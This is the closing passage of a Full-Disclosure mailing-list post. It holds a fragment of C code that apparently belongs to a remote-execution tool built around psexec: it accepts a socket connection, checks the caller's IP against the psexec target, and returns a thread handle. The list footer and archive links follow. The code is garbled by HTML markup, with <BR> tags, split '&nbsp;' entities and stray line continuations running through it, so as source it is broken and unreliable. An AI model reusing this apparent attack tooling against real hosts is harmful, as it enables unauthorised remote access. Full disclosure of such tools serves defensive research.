// printf("\n psexec exit 0x%x \
code",exitcode);<BR> \
break;<BR> \
}<BR> \
}<BR> & \
nbsp; \
<BR> \
\
i=sizeof(struct sockaddr);<BR> \
\
rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i);<BR> \
<BR> &n \
bsp; \
memcpy(&s_in4,&addr2,15);<BR> \
if(rnetinfo->fd4>0)<BR> \
{<BR> \
if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){<BR> &n
bsp; printf("\n fd4 \
error.");<BR> \
closesocket(rnetinfo->fd4);<BR> \
}<BR> & \
nbsp; \
else<BR> { \
<BR> printf("\n fd4 ok! \
ip=%s",ipbuff);<BR> \
break;<BR> \
}<BR> \
}<BR> \
}<BR> \
<BR> return(threadhandle);<BR>}<BR><BR> </body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic